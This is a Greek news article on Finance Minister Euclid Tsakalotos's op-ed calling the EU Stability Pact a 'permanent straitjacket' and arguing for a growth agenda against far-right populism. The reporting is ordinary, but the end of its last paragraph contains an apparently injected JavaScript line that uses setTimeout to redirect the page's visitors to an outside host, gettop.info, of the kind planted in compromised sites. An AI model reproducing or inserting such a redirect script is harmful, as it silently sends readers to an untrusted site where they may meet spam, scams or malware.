Τσακαλώτος: Μόνιμος ζουρλομανδύας το Σύμφωνο Σταθερότητας

0
23

 

Μία ημέρα μετά τη δημοσιοποίηση της επιστολής του προς τους θεσμούς, πρόεδρο του Eurogroup Γερούν Ντάισελμπλουμ και επικεφαλής του ESM Κλάους Ρέγκλινγκ, ο υπουργός Οικονομικών Ευκλείδης Τσακαλώτος με άρθρο του στο Open Democracy τονίζει ότι η Ευρώπη χρειάζεται μια ξεκάθαρη αναπτυξιακή ατζέντα για να αντιμετωπίσει τον λαϊκισμό και την ακροδεξιά, λέγοντας πως «η Ευρώπη αντιμετωπίζει πρόβλημα χαμηλής ανάπτυξης, υψηλής ανεργίας και επιδείνωσης των υποδομών και της κοινωνικής πρόνοιας«.

Επίσης, χαρακτηρίζει ως «ζουρλομανδύα» το Σύμφωνο Σταθερότητας προειδοποιώντας ότι η εμμονή στο αφήγημα: «οι κανόνες είναι κανόνες», αναμένεται να οδηγήσει την ευρωζώνη στη διάλυση.

Το συγκεκριμένο αφήγημα, σύμφωνα με τον υπουργό Οικονομικών, εντοπίζεται κυρίως στις χώρες του βορρά και τις δεξιές πολιτικές δυνάμεις, αλλά και σε ορισμένες πολιτικές «πτυχές της κεντροαριστεράς» και απόψεις, όπως του Μπλερ, του Σρέντερ και του Σημίτη. «Το βασικό επιχείρημα συνίσταται στο ότι η Ε.Ε. βασίζεται στους κανόνες και η συχνή αλλαγή αυτών μπορεί να υπονομεύσει την αξιοπιστία της Ε.Ε. και του ευρώ», αναφέρει ο κ. Τσακαλώτος.

Παράλληλα, εξαιτίας εν λόγω αφηγήματος, οι πολίτες του βορρά αρχίζουν να κουράζονται με τη διάσωση των χωρών του νότου, οι οποίες εμφανίζονται αδύναμες ή απρόθυμες να συμμορφωθούν με τους κανόνες.

«Ως εκ τούτου εξάγεται το συμπέρασμα ότι η Ευρώπη μπορεί να σωθεί, υπό την προϋπόθεση ότι όλα τα κράτη – μέλη θα μοιάσουν στη Γερμανία (κάτι που είναι αδύνατο). Αν δεν συμβεί αυτό, τότε οι λαϊκίστικες και κεντρόφυγες δυνάμεις θα ενισχυθούν πολιτικά και θα υπονομεύσουν την Ευρώπη»., σημειώνει και προσθέτει: «Από την άλλη πλευρά, υπάρχει το κοινωνικό αφήγημα, το οποίο εντοπίζεται κυρίως, στις χώρες του νότου και στις πολιτικές δυνάμεις της Αριστεράς. Σύμφωνα μ’ αυτό το Σύμφωνο Σταθερότητας και Ανάπτυξης λειτουργεί ως «μόνιμος ζουρλομανδύας» και έχοντας αποκλείσει την επιλογή της υποτίμησης, η νομισματική ένωση δεν μπορεί να βρει κατάλληλα υποκατάστατα στη διαδικασία της δημοσιονομικής μετάβασης. Ακόμη, οι πολίτες όχι μόνο ένιωσαν τις συνέπειες της κρίσης, αλλά δεν έχουν και εμπιστοσύνη για το πώς θα επωφεληθούν από μια οικονομική ανάκαμψη. Οι ευρωπαϊκοί θεσμοί είναι κολλημένοι στο προ κρίσης παρελθόν όταν τα μεγάλα προβλήματα θεωρούνταν ο πληθωρισμός και η δημοσιονομική απειθαρχία.

Επίσης, ο ίδιος τονίζει πως η απάντηση της Ευρώπης στην άνοδο των ακραίων πολιτικών δυνάμεων πρέπει να είναι η εφαρμογή μιας νέας οικονομικής πολιτικής, που δεν θα βάζει ως προτεραιότητα τον πληθωρισμό και τα ελλείμματα αλλά την τόνωση της ανάπτυξης και τη μείωση της ανεργίας.

Μεταξύ άλλων, ο κ. Τσακαλώτος αναφέρει ότι χωρίς μια ατζέντα που θα περιλαμβάνει τις ανησυχίες των πολιτών για τους μισθούς, τις συντάξεις και τα επιδόματα, οι ακροδεξιοί λαϊκιστές θα συνεχίσουν να κερδίζουν έδαφος, καθώς απηχούν στις υλικές ανάγκες της κοινωνικής βάσης της Κεντροαριστέρας και της Κεντροδεξιάς.

Σύμφωνα με τον Έλληνα υπουργό Οικονομικών, η επόμενη χρονιά θα δείξει τελικά ποιο αφήγημα θα επικρατήσει και αν θα μπορέσει να υπάρξει μια πραγματική προσπάθεια από όλοuς για να προχωρήσουμε πέρα από τον διάλογο των «κωφών», έτσι ώστε να συγκλίνουμε σε ένα νέο αφήγημα, από το οποίο θα εξαρτηθεί και η επιτυχία του ευρωπαϊκού πρότζεκτ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here